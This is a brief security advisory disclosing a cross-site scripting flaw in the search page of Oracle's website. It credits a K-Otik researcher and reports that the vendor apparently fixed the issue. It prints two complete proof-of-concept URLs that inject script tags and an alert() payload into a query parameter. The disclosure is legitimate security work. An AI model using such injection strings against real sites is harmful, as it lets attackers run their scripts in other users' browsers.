|
|
| |
| A Cross Site Scripting vulnerability has been discovered in Oracle' Official site. The vulnerability would allow attackers to cause users to view 3rd-party malicious JavaScript or HTML code as if it were the legitimate content offered by Oracle. |
| |
Credit:
The information has been provided by Bekrar Chaouki - K-Otik.
|
| |
Bekrar Chaouki - K-Otik found XSS vulnerabilities in Oracle's official website oracle.com.
Example:
http://www.oracle.com/ultrasearch/wwws/searchoc.jsp?p_Action=Search&p_Group=
1&p_Group=4&selectaproduct=Select+a+Product&selectatopic=Select+a+Topic&p_Qu
ery=%22%22%3Cscript%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3EAnother+Vulner
ability+found+by+K-Otik%3C%2Fscript%3E%3Cbr%3E%3Cbr%3E%3CXSS+By+k-otik%22%22
&Advanced.x=4&Advanced.y=6"XSS><scr!pt>alert('Vulnerability%20by%20K-otik.co
m')</scr!pt><XSS%20By%20k-otik""
http://www.oracle.com/ultrasearch/wwws/searchoc.jsp?p_Action=Search&p_Group=
1&p_Group=4&selectaproduct=Select+a+Product&selectatopic=Select+a+Topic&p_Qu
ery=%22XSS%3E%3Cscr!pt%3Ealert%28%27Vulnerability+found+by+K-otik.com%27%29%
3C%2Fscr!pt%3E%3CXSS++found+By+k-otik%22%22&Advanced.x=14&Advanced.y=10
Vendor response:
Oracle have been contacted, and have appeared to fixed the issue.
|
|
|
|
|
|
|
|